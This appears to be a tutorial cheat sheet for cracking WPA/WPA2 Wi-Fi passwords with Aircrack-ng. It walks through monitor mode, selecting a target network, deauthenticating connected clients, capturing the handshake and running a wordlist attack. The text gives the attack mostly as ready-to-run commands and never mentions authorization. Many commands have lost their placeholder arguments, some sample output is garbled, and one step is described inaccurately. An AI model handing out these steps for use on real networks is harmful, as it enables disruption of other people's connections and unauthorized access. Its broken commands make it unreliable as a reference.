Aircrack-ng

Overview of Tools

airodump-ng: Captures packets from wireless networks, providing information about available networks and connected clients.
aireplay-ng: Injects packets into the network to create traffic or perform attacks.
aircrack-ng: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
airmon-ng: Configures your wireless interface to monitor mode.

Setting Up Your Environment

Enable Monitor Mode:

sudo airmon-ng start wlan0

Replace

wlan0

with your specific wireless interface name.

Verify Monitor Mode:
Use

iwconfig

to check that your interface is in monitor mode. Look for

wlan0mon

or similar.

Check for Interfering Processes:

sudo airmon-ng check kill

This command stops processes that might interfere with Aircrack-ng.

Confirm Interface Status:
After enabling monitor mode, confirm that your interface is set up correctly:

iwconfig

Prepare for Packet Capture:
Ensure your environment is ready to capture packets, typically in a location with accessible Wi-Fi networks.

Capturing Wireless Traffic

Start Airodump-ng:

sudo airodump-ng wlan0mon

This command starts capturing packets and displays nearby wireless networks.

Identify Target Network:
Look for the following information:

• BSSID: MAC address of the access point.
• ESSID: Name of the network.
• Channel: The channel the network operates on.

Filter Captured Data:
To filter for a specific network, note its BSSID and channel, then run:

sudo airodump-ng --bssid  -c  wlan0mon

Capture Handshake:
To capture the WPA/WPA2 handshake, continue monitoring until a client connects or perform a deauthentication attack.

Save Captured Data:
To save the captured packets to a file, use:

sudo airodump-ng --bssid  -c  -w capture wlan0mon

This saves the output to a file named

capture.cap

.

Targeting a Specific Network

Capture Handshake:
Start by running airodump-ng to capture packets from the target network:

sudo airodump-ng --bssid  -c  -w capture wlan0mon

Replace

and

with the target network's BSSID and channel.

Deauthenticate a Client (if needed):
If no handshake is captured, you can force a client to reconnect by sending deauthentication packets:

sudo aireplay-ng --deauth 10 -a  wlan0mon

This command sends 10 deauth packets to the specified BSSID.

Monitor for Handshake Capture:
Watch the airodump-ng output for the message indicating that a handshake has been captured. It typically appears as:

WPA handshake: 

Save Captured Handshake:
Ensure that the handshake is saved in your

capture.cap

file for later analysis.

Verify the Capture:
After capturing the handshake, you can verify it by using:

aircrack-ng capture.cap

Generating Traffic for Handshake

Use Aireplay-ng to Generate Traffic:
To capture a WPA/WPA2 handshake, you can generate traffic on the target network. This can be done by deauthenticating a connected client, prompting them to reconnect.

Deauthenticate a Client:
Identify an active client connected to the target network. Use the following command:

sudo aireplay-ng --deauth 10 -a  -c  wlan0mon

Replace

with the target network's BSSID and

with the MAC address of the connected client. The 10 specifies the number of deauthentication packets to send.

Monitor for Handshake:
Keep airodump-ng running in a separate terminal window to watch for the handshake capture. You should see:

WPA handshake: 

Capture Additional Traffic:
If you want to ensure more handshakes are captured, consider using the following to continuously send packets:

sudo aireplay-ng --fake-auth  wlan0mon

Validate the Handshake:
Once you have captured a handshake, ensure that it's saved in your

capture.cap

file for further analysis.

Validating the Handshake

Check the Capture File:
Use the aircrack-ng tool to examine the contents of your capture file. Run the following command:

aircrack-ng capture.cap

Analyze Output:
Look for output that indicates whether a valid handshake was detected. You should see a message like:

WPA handshake: 

Verify Handshake Quality:
If a handshake is detected, you can also assess the quality of the capture by checking the number of packets captured:
More packets generally indicate a better chance of successful cracking.

Inspect with Wireshark (Optional):
If you want a deeper analysis, open the capture file with Wireshark:

wireshark capture.cap

Look for packets labeled as EAPOL, which are essential for the WPA/WPA2 handshake.

Crack the Handshake (Optional):
If the handshake is valid, you can proceed to attempt cracking the password using a wordlist:

aircrack-ng -w  capture.cap

Replace

with the path to your dictionary file.

Cracking WPA/WPA2 Passwords

Ensure You Have a Handshake:
Before attempting to crack the password, confirm that you have captured a valid WPA/WPA2 handshake in your

capture.cap

file.

Choose a Wordlist:
Select a wordlist that contains potential passwords. You can use built-in wordlists like

rockyou.txt

, or create your own.

Run Aircrack-ng:
Use the following command to start the cracking process:

aircrack-ng -w  capture.cap

Replace

with the path to your wordlist file.

Monitor Progress:
As Aircrack-ng runs, it will display attempts and indicate when a password is found. It may look like this:

12345: 12:34:56:78:9A:BC

Successful Crack:
If successful, you will see output similar to:

KEY FOUND! [ password123 ]

Additional Options:
If you have a custom wordlist, use it with:

aircrack-ng -w /path/to/custom_wordlist.txt capture.cap